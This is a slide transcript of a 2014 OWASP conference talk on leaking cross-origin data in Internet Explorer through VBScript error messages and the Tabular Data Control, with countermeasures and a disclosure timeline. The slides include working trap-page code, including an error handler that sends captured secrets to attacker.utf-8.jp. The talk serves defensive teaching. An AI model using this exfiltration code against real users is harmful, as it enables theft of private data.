Bypass SOP, Theft your data
- XSS Allstars from Japan -
Yosuke HASEGAWA
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http:/...
Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabul...
VBScript Error message
VBScript Error Msg
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Reading JSON Array as VBScript on
trap page cr...
VBScript Error Msg
Reading JSON as VBScript src
fail → raises exception
// Trap page by attacker
<script
src="http://examp...
VBScript Error Msg
catch error msg with error handler
GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%2...
Countermeasure
Countermeasure
add "X-Content-Type-Options:nosniff"
HTTP/1.1 200 OK
Content-Type: application/json; charset...
VBScript Error Msg
supplementary
supplementary
Dec 2012: reported to MS by me and
@masa141421356
May 2013: Fixed with MS13...
Tabular Data Control
Tabular Data Control
Tabular Data Control - TDC
ActiveX Control for binding text file into
HTML as data table
http://msdn....
Tabular Data Control
// Trap page by attacker on attacker.utf-8.jp
function show(){
var s = document.getElementById("tdc")...
Tabular Data Control
Attacker has to insert
"@!allow_domains=..." into the top
of target text
Once inserted, no way to pre...
Countermeasure
Countermeasure
Restrict access to XHR request with
custom X header
and / or...
var xhr = new XMLHttpRequest...
Countermeasure(cont.)
Countermeasure (cont.)
Don't allow to place text by attacker
into top of the content
//target page i...
Conclusion
Conclusion
Conclusion
IE has funny behavior even now
Add X-Content-Type-Options for all
resources
Restrict access to XHR w...
Question ?
Question ?
hasegawa@utf-8.jp
@hasegawayosuke
http://utf-8.jp/
Upcoming SlideShare
Loading in …5
×

Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014

4,581 views

Published on

Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014

  1. 1. Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA
  2. 2. About Me Yosuke HASEGAWA @hasegawayosuke Engineer of NetAgent Co.,Ltd. Secure Sky Technology Inc. technical adviser http://utf-8.jp/ author of jjencode, aaencode, ... OWASP Kansai Chapter Leader OWASP Japan Chapter Advisory Board member
  3. 3. Agenda Cross-Origin information disclosure Not XSS, but bypass SOP Introduce 2 ways for modern IE VBScript Error msg Tabular Data Control
  4. 4. VBScript Error message
  5. 5. VBScript Error Msg VBScript Error Msg Target: IE9-10 (IE6-8 are safe, wow!) Reading JSON Array as VBScript on trap page created by attacker VBScript raises exception with error message including JSON content JavaScript can access to JSON content via error message
  6. 6. VBScript Error Msg Reading JSON as VBScript src fail → raises exception // Trap page by attacker <script src="http://example.jp/target.json" language="vbscript"> </script> HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 [ "secret", "data", "is", "here" ]
  7. 7. VBScript Error Msg catch error msg with error handler GET http://attacker.utf-8.jp/log?Type%20mismatch:%20' %20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1 Referer: http://attacker.utf-8.jp/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) <script> window.onerror = function( e ){ document.getElementById( "img" ).setAttribute( "src", "http://attacker.utf-8.jp/log?" + e ); } </script> <script src="http://example.jp/target.json" language="vbscript"></script>
  8. 8. Countermeasure Countermeasure add "X-Content-Type-Options:nosniff" HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff [ "secret", "data", "is", "here" ]
  9. 9. VBScript Error Msg supplementary supplementary Dec 2012: reported to MS by me and @masa141421356 May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not. "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.
  10. 10. Tabular Data Control
  11. 11. Tabular Data Control Tabular Data Control - TDC ActiveX Control for binding text file into HTML as data table http://msdn.microsoft.com/en-us/library/ms531356.aspx Enabled by default on IE6-IE11, with older doc-mode <meta http-equiv="x-ua-compatible" content="IE=10"> Spotlighted by Cure53 X-Mas Challenge https://cure53.de/xmas2013/ https://cure53.de/xmas2013/writeup The winner is @kinugawamasato
  12. 12. Tabular Data Control // Trap page by attacker on attacker.utf-8.jp function show(){ var s = document.getElementById("tdc") .recordset.getString(); alert( s ); } ... <meta http-equiv="x-ua-compatible" content="IE=10" > <object id="tdc" ondatasetcomplete="show()" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://example.jp/target.txt"> </object> //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
  13. 13. Tabular Data Control Attacker has to insert "@!allow_domains=..." into the top of target text Once inserted, no way to prevent from theft Unhelpful: X-Content-Type-Options: nosniff Content-Disposition: attachment
  14. 14. Countermeasure Countermeasure Restrict access to XHR request with custom X header and / or... var xhr = new XMLHttpRequest(); xhr.open( "GET", "http://example.jp/target.txt", true ); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.send( null ); GET /target.json HTTP/1.1 Host: example.jp User-Agent: Mozilla/5.0… Accept: */* X-Requested-With: XMLHttpRequest
  15. 15. Countermeasure(cont.) Countermeasure (cont.) Don't allow to place text by attacker into top of the content //target page included secret data on example.jp/target.txt Content-Type: application/octet-stream Content-Disposition: attachment; filename=bindata X-Content-Type-Options: nosniff @!allow_domains=attacker.utf-8.jp secret,data,is,here
  16. 16. Conclusion
  17. 17. Conclusion Conclusion IE has funny behavior even now Add X-Content-Type-Options for all resources Restrict access to XHR with custom X- header
  18. 18. Question ? Question ? hasegawa@utf-8.jp @hasegawayosuke http://utf-8.jp/

×